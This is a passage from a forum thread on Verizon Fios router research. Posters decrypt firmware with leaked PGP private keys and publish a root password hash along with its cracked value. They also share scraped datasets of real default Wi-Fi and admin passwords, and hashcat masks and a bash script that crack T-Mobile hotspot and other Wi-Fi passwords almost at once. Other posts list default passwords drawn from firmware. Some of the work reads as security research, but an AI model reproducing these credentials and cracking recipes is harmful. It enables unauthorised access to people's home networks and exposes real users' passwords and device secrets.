Cts5RImcGp/g4xqzV7y4bQ9LR8BZseoWpMdhdfolUdy972/ZqMtElQtDgla0DBGX
id9d9hdIpDBmKNKKOSkndQLMcQQA6C4ylHUCNMC4tQVTmzylFaYyTre3OIxad8Xp
NdVgpqX42il5Nib4EDz72GLIbZAiCxi1l5FTVuUY/Lz23jxqSbNRJ5NmdJKWgAcT
GnQu4GBXuRLNl+tXy7UcVw3Z53jEWnmqDkNwCc3ozJD7Rew/0X0briNecSwKsxJq
/OqeCnED/iJJUZC4aotpfRq3n2GrzavzxepRiz/U3OuhBxa0LR4xIHDrapr5XQSE
azYsg+Zy1uG+NO2j5NvmJwSKChV4gI5J66qHDLRAWbT7XGeukb3rgXu2uhsx4NRj
GAGkfAqRnKmtgIVyDuqqtW4vRSmzLhIjMd2QDCaMfSyAtb+9MltoPseJAR8EGAEC
AAkFAlLP6aQCGwwACgkQq8dIUWZiduX8EAf+Lrc3Zify4tiQU7mzjknYcZYBWVrj
6F+3FOnka+Zg7uwKcBK6fHQajClCXgLmPmLTNyYawaj2tM57TLYX9SsbdCA9Ng3b
0iMyCixOHY2OunTQv4wCYimGWs6WUXkUwlCFhnGGaPqLHkxXWEgiqu8IKgjaA2UN
B/kLChLVgnxqklAMC2AWT1mT4rmfjY6efWozEjeHOGNTagxT0efN3Sw01xitoekF
b1+jvE5K0EAKddMxSUbpv5V4kuBQ9gomZei6hl2xeYqjlbOAohXjXY1ViTiez3IE
MtbF9y9d0+OoaniAmZVWsufxjaf27n6DdT/S+7Jt1fTqTY9QYAJVd73Kog==
=c6nn
-----END PGP PRIVATE KEY BLOCK-----We can add these to our keyring using the commands
Code:
gpg --import G1100_key1.txtgpg: key 945FDCF4BDDB877F: secret key imported
gpg: Total number processed: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1
Code:
gpg --import G1100_key2.txtgpg: key ABC74851666276E5: secret key imported
gpg: Total number processed: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1
Then we can decrypt the firmware with the keys using this command
Code:
gpg --output <decrypted_output_file> --decrypt <encrypted_input_file>
gpg --output decrypted_bhr4_stepstone_release_1.2.0.36.98.0_firmwareupgrade.bin.signed --decrypt bhr4_stepstone_release_1.2.0.36.98.0_firmwareupgrade.bin.signedFinally we extract the decrypted firmware with
Code:
binwalk -Me decrypted_bhr4_stepstone_release_1.2.0.36.98.0_firmwareupgrade.bin.signedAnd this is where I have been stuck... binwalk only extracts a system.dtb and I am not really sure what to do from there. It took me way too long to realize that the decrypted firmware extracts cleanly with unblob!
Code:
unblob decrypted_bhr4_stepstone_release_1.2.0.36.98.0_firmwareupgrade.bin.signedThe PGP Keys also work to decrypt the firmware that I found (bhr4_release_02.03.00.13_firmwareupgrade.bin.signed and bhr4_release_02.03.00.14_firmwareupgrade.bin.signed), but frontier4_vz_stepstone_release_01.03.01.02_firmwareupgrade.bin.signed is still missing the key.
Poking around the firmware just a bit, every version has this in /etc/shadow
root:$6$rFBGnLMRIiVVPTZ8$1J3zPn31Wfrht0oOCKZW52YhbA.lmNieZ6C7zaJ3sANjVYYk28E3FAA1xEMN4ezAu1IAQBRShs4vRl/atc5tF0:15861:0:99999:7:::
RE: Verizon Fios G3100 and E3200 Research - FiosFiend - 07-12-2025
I didn’t bother to run the scrapes again this week. Since we are really only catching newly listed hits, I will probably update the database every 2-3 weeks from now on. That doesn’t mean that we don’t have some good info to share this week though!
This week I posted the root hashes that I've found for G1100 and NCQ1338, and @Sparton has successfully cracked the G1100 root:thinkgreen. THANKS! We are still looking for $1$7uheFpms$9IpAGF0yM8EV4CvwnpgD.1
I also reached out to @RealEnder, who shared the hcxpcapngtool -D output for all of the Verizon/Fios captures uploaded to WPA-SEC. As we know, the broadcast packets give us the MAC, MANUFACTURER, MODELNAME, SERIALNUMBER, DEVICENAME, UUID, ESSID. The first thing that I did was look for new Models. There are a good many MiFi devices. I looked a few of these up on eBay, and it doesn’t seem like they show their default password since the device has a screen. There are also a good many Extenders/Repeaters that are just broadcasting the Verizon/Fios SSID.
The one new device that I was able to identify is the LVR5-100, which is a 5g/4g cellular router manufactured by Wistron NeWeb. The device teardown shows the CPU is a stm32wb35, wihich is an Arm Cortex-M4 32-bit RISC core operating at a frequency of up to 64 MHz. Unfortunately, It doesn’t have a QR code, so we haven’t caught it with our scrape. There are only 2 entries for this device, which is unfortunate because the password is an easy to crack 8 character lowercase HEX! This model has been included with LVSKIHP in the packet database.
There is a device that just shows Broadcom and the same SN/UUID for all of the entries. I checked the MAC prefixes 10:78:5B and 70:F2:20 in the password database and identified this model as WCB6200Q. The only model that I didn’t find entries for is the ASK-RTL108, but here are a ton of entries for ALL of the other devices covered in this thread. Let’s take a look...
verizon_broadcast_info .xlsx (Size: 801.98 KB / Downloads: 4)
The verizon_broadcast_info data contains:
ARC-XCI55AX - 688 entries
ASK-NCM1100 - 49 entries
ASK-NCQ1338E - 671 entries
CR1000 - 2448 entries
CME1000 - 18 entries
E3200 - 669 entries
FSNO21VA - 132 entries
G1100 - 2793 entries
G3100 - 3081 entries
LVSKIHP - 15 entries
NVG558HX - 23 entries
WCB6200Q - 265 entries
WNC-CR200A - 327 entries
Total - 11179 entries
Note: Here MACS is what I’ve been calling “steps” throughout the thread. It’s calculated by comparing the differences in MAC address vs differences in Serial number. This results in a whole number that indicates how many MAC addresses each devices occupies.
Model: ARC-XCI55AX
Manufacture: Arcadyan
Device: Titan2
Serial Prefix: ABU GRR
Serial Length: 11
MACS: 4
MAC Prefix: 04:09:86 04:70:56 18:58:80 4C:22:F3 54:B7:BD 74:90:BC 84:90:0A 84:A3:29 8C:83:94 A8:A2:37 AC:B6:87 BC:F8:7E C0:D7:AA C8:99:B2 DC:F5:1B F4:CA:E7
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 04098647eaa3 = bc329e001dd811b2860104098647eaa2
SSID: Verizon_XXXXXX
Model: ASK-NCM1100
Manufacture: Arcadyan
Device: TITAN4
Serial Prefix: ACL ACN ACQ ACR
Serial Length: 11
MACS: 6
MAC Prefix: 38:88:71
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address
EX: 3888710aee34 = bc329e001dd811b286013888710aee32
SSID: Verizon_XXXXXX
Model: ASK-NCQ1338E
Manufacture: Askey
Device: NCQ1338
Serial Prefix: AA1 AAM ABB ABF ABG G1C G1D G1E
Serial Length: 11
MACS: 4
MAC Prefix: 88:DE:7C 2C:EA:DC 4C:AB:F8 A4:97:33 FC:12:63 74:93:DA
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 2ceadc10f653 = 876543219abcdef012342ceadc10f652
SSID: Verizon_XXXXXX
Model: CR1000
Manufacture: Arcadyan
Device: ath1 or CHR2f
Serial Prefix: ABJ AB2 AAW AAY ACZ ABP ABQ ABV ABW
Serial Length: 11
MACS: 7 (CR1000A) or 9 (CR1000B)
MAC Prefix: 04:70:56 58:96:71 04:09:86 1C:D6:BE 24:41:FE 34:19:4D 3C:F0:83 4C:22:F3 54:B7:BD 74:90:BC 78:67:0E 84:90:0A 84:A3:29 86:67:0E 88:5A:85 8C:83:94 A8:A2:37 AC:91:9B AC:B6:87 BC:F8:7E C8:99:B2 DC:4B:A1 DC:F5:1B
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address. This matches what we discovered earlier.
EX: 047056582046 = 876543219abcdef01234047056582044
SSID: FiOS-XXXXX, Fios-XXXXX or Verizon_XXXXXX
Model: CME1000
Manufacture: Arcadyan
Device: CHR2tte
Serial Prefix: ABA
Serial Length: 11
MACS: 6
MAC Prefix: 4C:22:F3 54:B7:BD 74:90:BC 84:A3:29 8C:83:94 BC:F8:7E DC:F5:1B
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address
EX: 4c22f34c6688 = bc329e001dd811b286014c22f34c6686
SSID: Verizon_XXXXXX
Model: E3200
Manufacture: Arcadyan
Device: E3200
Serial Prefix: E301 E302 AA62 AA63 AA64
Serial Length: 16
MACS: 6
MAC Prefix: 04:A2:22 3C:BD:C5 62:A2:22 62:BD:C5 62:F8:53 6A:A2:22 6A:BD:C5 6A:F8:53 72:A2:22 72:BD:C5 72:F8:53 74:90:BC B8:F8:53 DC:F5:1B
UUID: Appears to be random
SSID: Fios-XXXXX or Verizon_XXXXXX
Model: FSNO21VA
Manufacture: Arcadyan
Device: ath0
Serial Prefix: ABH
Serial Length: 11
MACS: 1
MAC Prefix: 98:C8:54
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, but the last 6 digits of X doesn’t match the MAC address
EX: 98c854a7a4e0 = 876543219abcdef0123498c8549951e8
EX: 98c854a8d4af = 876543219abcdef0123498c8549aaa86
SSID: Verizon_XXXXXX
Model: G1100
Manufacture: GreenWave
Device: GreenWave
Serial Prefix: G1A1 G1A2 S1A1
Serial Length: 15
MACS: 5
MAC Prefix: 18:78:D4 20:C0:47 20:C0:C7 29:6A:0B 48:5D:36 C8:A7:0A D4:A9:28
UUID: Appears to be random
SSID: FiOS-XXXXX or Fios-XXXXX
Model: G3100
Manufacture: Arcadyan
Device: G3100
Serial Prefix: G401 G402
Serial Length: 16
MACS: 11 or 8 depending on manufacture date
MAC Prefix: 04:A2:22 3C:BD:C5 B8:F8:53
UUID: Appears to be random
SSID: Fios-XXXXX or Verizon_XXXXXX
Model: LVSKIHP
Manufacture: WNC
Device: Verizon K2
Serial Prefix: GI1A GI1B (identified from image scrape data)
Serial Length: 12
MACS: Unknown
MAC Prefix: 64:FF:0A 88:5A:85 B8:9F:09 44:E4:EE
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address.
EX: 64ff0a558556 = 876543219abcdef0123464ff0a558554
SSID: Verizon-5G-Home-XXXX or Verizon-LRV5-XXXX
Model: NVG558HX
Manufacture: Commscope
Device: <same as Serial Number>
Serial Prefix: MV2
MACS: 12
MAC Prefix: 20:F3:75 58:60:D8 8C:5A:25 E4:F7:5B
UUID: Appears to be random
SSID: Verizon-XXXX
Model: WCB6200Q
Manufacture: Broadcom
Device: <blank>
Serial Prefix: GWXA GWXB MWXB (identified from image scrape data)
Serial Length: 14
MACS: 16 (calculated from image scrape data)
MAC Prefix: 10:78:5B 4C:8B:30 70:F2:20
UUID: ALL entries show a single UUID d96c7efc2f8938f1efbd6e5148bfa812
SSID: FiOS-XXXXX or Fios-XXXXX
Note: This device is an extender only, so it is broadcasting the base SSID/Password
Model: WNC-CR200A
Manufacture: Arcadyan
Device: ath0 or ath1
Serial Prefix: ACA AC0
Serial Length: 11
MACS: 4
MAC Prefix: 58:96:71 24:41:FE AC:91:9B DC:4B:A1
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 589671080e92 = 876543219abcdef01234589671080e91
SSID: Verizon_XXXXXX
I noticed that the new model from last week, the CME1000 has the device name CHR2tte, which looks very similar to CHR2f (CR1000). So I added it to the firmware fuzzing script and we found the firmware for it!
Code:
https://cpe-ems34.verizon.com/firmware/chr2tte_fw_3.2.0.9.bin
https://cpe-ems34.verizon.com/firmware/chr2tte_fw_3.2.0.11.bin
https://cpe-ems34.verizon.com/firmware/chr2tte_fw_3.2.0.12.binIt seems to extract ok with unblob, leaving us with 3 files. Unfortunately the root is LUKS encrypted and this is where I’m stuck.
cat CONTROL
BOARD=mt7986a-ax8400-2500wan-emmc-rfb-sb
file kernel
Device Tree Blob version 17, size=21649753, boot CPU=0, string block size=194, DT structure block size=21649160
file root
LUKS encrypted file, ver 1 [aes, xts-plain64, sha256] UUID: 8856759b-9e7d-41db-b48e-7f1deb53cbb0
binwalk -Me chr2tte_fw_3.2.0.9.bin
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
256 0x100 POSIX tar archive, file count: 4
---------------------------------------------------------------------------------------------------
Analyzed 1 file for 85 file signatures (187 magic patterns) in 173.0 milliseconds
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
256 0x100 POSIX tar archive, file count: 4
---------------------------------------------------------------------------------------------------
[+] Extraction of tarball data at offset 0x100 completed successfully
---------------------------------------------------------------------------------------------------
sysupgrade-mt7986a-ax8400-2500wan-emmc-rfb-sb/kernel
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
0 0x0 Device tree blob (DTB), version: 17,
CPU ID: 0, total size: 21649465 bytes
----------------------------------------------------------------------------------------------------
[+] Extraction of dtb data at offset 0x0 completed successfully
----------------------------------------------------------------------------------------------------
Analyzed 5 files for 85 file signatures (187 magic patterns) in 1.5 seconds
Last weeks scrape caught a TMOHS1 from T-Mobile. I noticed that it has HUGE weakness. They use the last 8 digits of the IMEI as the password, and the last 4 digits for the SSID. The admin password is even easier to “guess" 🤣
I reached out to @RealEnder with this info. He confirmed that only 2 of the submitted hashes had been found, but both of them followed this pattern. He was able to quickly crack most of the other hashes; there are now 42 found! Looking back at the found hashes, ALL of the passwords start with the first 4 digits 5000-7999. This leaves us with 3000 possible candidates, which means you could probably crack it live without a handshake haha. It’s a very small contribution, but it makes me happy to have discovered this! Using this hashcat command should instantly crack the hash, here we are on a Raspberry Pi 4.
T-Mobile Hotspot_3613_2.4GHz
WPA*02*f61b53de19d07fb2f875d56fa45269bf*a4d7952abcb0*3e4bdfe15ce0*542d4d6f62696c6520486f7473706f745f333631335f322e3447487a*92ca24dea47338cbdb9eb12cf752aee13e9d5cbab214df0e48ab880d9c1375b0*0103007502010a000000000000000000012513a7b3328129988b18743eadc5e58224c6afa79b6a47acf5ce1ae6c54f01d9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*82
Code:
hashcat -m 22000 -a 3 TMobile.txt -1 567 ?1?d?d?d<4 digits from SSID>
hashcat -m 22000 -a 3 TMobile.txt -1 567 ?1?d?d?d3613RE: Verizon Fios G3100 and E3200 Research - ZerBea - 07-13-2025
Great investigation.
You can also add "T-Mobile Broadbandxx" to your list: PSK pattern = ?d?d?d?d?d?dxx
Or to cover both, T-Mobile Broadbandxx and T-Mobile Hotspot_xxxx_2.4GHz, from an entire hash file:
Code:
#!/bin/bash
$ hcxhashtool -i hashlist.22000 --essid-part='T-Mobile Broadband' -o test.22000
$ hcxhashtool -i hashlist.22000 --essid-part='T-Mobile Hotspot_' -o test.22000
if [ -s "test.22000" ]
then
hcxhashtool -i test.22000 -E essid.list
while read LINE
do
echo "$LINE";
hcxhashtool -i test.22000 --essid="$LINE" -o testline.22000
hcxpsktool -c testline.22000 --noessidcombination | hashcat -m 22000 --stdin-timeout-abort=600 -o founds.list testline.22000
rm testline.22000
done < essid.list
rm essid.list
rm test.22000
fiRE: Verizon Fios G3100 and E3200 Research - FiosFiend - 07-23-2025
@ZerBea thanks for the response and thanks for all of your work! @RealEnder did a great job with imeigen, and has added the T-Mobile hotspot further reducing the possible candidates. I haven’t had a chance to check out the T-Mobile devices you shared to see if they have the same weakness.
Fios-F1nDr has been updated to differentiate between ARC-XCI55AX, CR1000, CME1000, E3200 for the DC:F5:1B MAC prefix. There is still a bit more of this type of work I have to do to the script, but overall it’s working well.
This week I was able to add 63 new entries to the password database.
Updated Data Set:
router_data_FULL_072325.xlsx (Size: 898 KB / Downloads: 3)
The Dataset now contains:
G3100/E3200 - 697 entries
CR1000 A/B - 177 entries
ARC-XCI55AX - 143 entries
ASK-NCQ1338 - 165 entries
WNC-CR200A - 62 entries
G1100 - 374 entries
NVG558HX - 67 entries
Other - 143 entries
Total - 1828 entries
We caught a new device too, the XC46BE, which is also manufactured by Arcadyan. The device teardown shows a variety of chips. I believe the Mediatek MT6990V is the ARM CPU, but I couldn’t find much info. The device QR code and sticker provide a great bit of info.
Code:
('WIFI:S:Verizon_TC9CP6;T:WPA;P:bet9nearly8mane;;ROUTER:M:XC46BE;S:ACS44201412;D:11-26-2024;F:3.4.0.5;P:4CLBGTZS7;E:357632330053454;B:3806E60264DD;;1',)I found the device using the data from WPA-SEC, here is the info broadcast in the packet. The device is the DRAGON
Code:
2037f022cf12 Arcadyan XC46BE ACS50602760 DRAGON bc329e001dd811b286012037f022cf10 Verizon_BJ3F49Model: XC46BE
Manufacture: Arcadyan
Device: DRAGON
Serial Prefix: ACS
MACS: Not enough Info
MAC Prefix: 20:37:F0 38:06:E6
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address
EX: 3806e6801442 = bc329e001dd811b286013806e6801440
SSID: Verizon-XXXX
The 3 password entries I was able to find show that The SSID password is 15 characters, and follows a new format <word><digit><word><digit><word>. So far, these passwords are comprised of a 3-letter, 4-letter, and 6-letter word with single digits. The admin password is 9 character alphanumeric as we’ve seen with a lot of the other devices.
Wi-Fi Name: Wi-Fi Password: Len Admin Password:
Verizon_4XZF4L wed5poem7cherub 15 6KFV7CHGS
Verizon_TC9CP6 bet9nearly8mane 15 4CLBGTZS7
Verizon_94CSGD blouse3cate7ran 15 ZK4TNDJQ6
The CSG m106 was also caught in the scrape, which is some sort of Verizon device though it doesn’t have the Verizon/Fios SSID. There QR code is just a link to the CSG website. However, the password is 8 character hex that is actually just the end of the serial number. Unfortunately, this device does not broadcast any ESSID information. I did the normal eBay, FB, OfferUp scrape and caught 19 entries. The serial numbers appear to be a a random 16 character hex, possibly a truncated hash. So I had a script try various user input, as well as Unix Epoch time against the password. There are several hashes that produce the password, but none that produce the full serial, so I suspect they are false positives. @RealEnder found the firmware (https://connectcsg.com/pages/firmware-updates), which extracts nicely...so I checked to see how the SN is being generated.
In the file gl_init we see
Code:
uci set glconfig.general.factory_mac=$(get_default_mac_with_colon)
uci set glconfig.general.factory_sn=$(get_default_sn)
ssid=`uci get glconfig.general.factory_mac | awk -F ":" '{print $(NF-1)$NF}'`
uci set wireless.@wifi-iface[$index].ssid="CSG-${ssid}"
key=`uci get glconfig.general.factory_sn | awk '{print substr($0,9)}'`So we see The SSID is generated from the MAC, and the key is last 8 characters of the factory_sn. Unfortunately the factory_sn is pulled from NVRAM.
The data collected for CSG m106 all have the MAC prefix 94:83:C4, so I checked there in the WPA-SEC data. There are not any CSG entries since they don’t broadcast the information, however there are several GL-SFT1200 that overlap the address space. The firmware for this device is also available (https://dl.gl-inet.com/router/sft1200/stable), extracts cleanly, and is very similar to the CSG m106 with some minor vendor changes. In gl_init file for both firmware we see
Code:
ssid_prefix="GL-"${model}
uci set wireless.@wifi-iface[$index].key=goodlifeAs the image above shows, devices with the SSID GL-<model> have the default password “goodlife”. The firmware shows other models this applies to AR300M, AR750, B1300, B2200, E750, MT750, S200, S1300, X750, X1200
One of the devices that the default password doesn’t work on is the GL-MT3000 and GL-MT6000, which we see has a 10 character alphanumeric password :frown:. We have the firmware for this device too (https://dl.gl-inet.com/router/mt3000/stable and https://dl.gl-inet.com/router/mt6000/stable). The password seems to be pulled from NVRAM.
Code:
wifi_password=`lua /usr/bin/get_unique_password.lua`
lfactory.get_unique_password()But the guest networks may still have the default password “goodlife"
Code:
set wireless.$1.key=goodlife
set wireless.$guest.device="$device"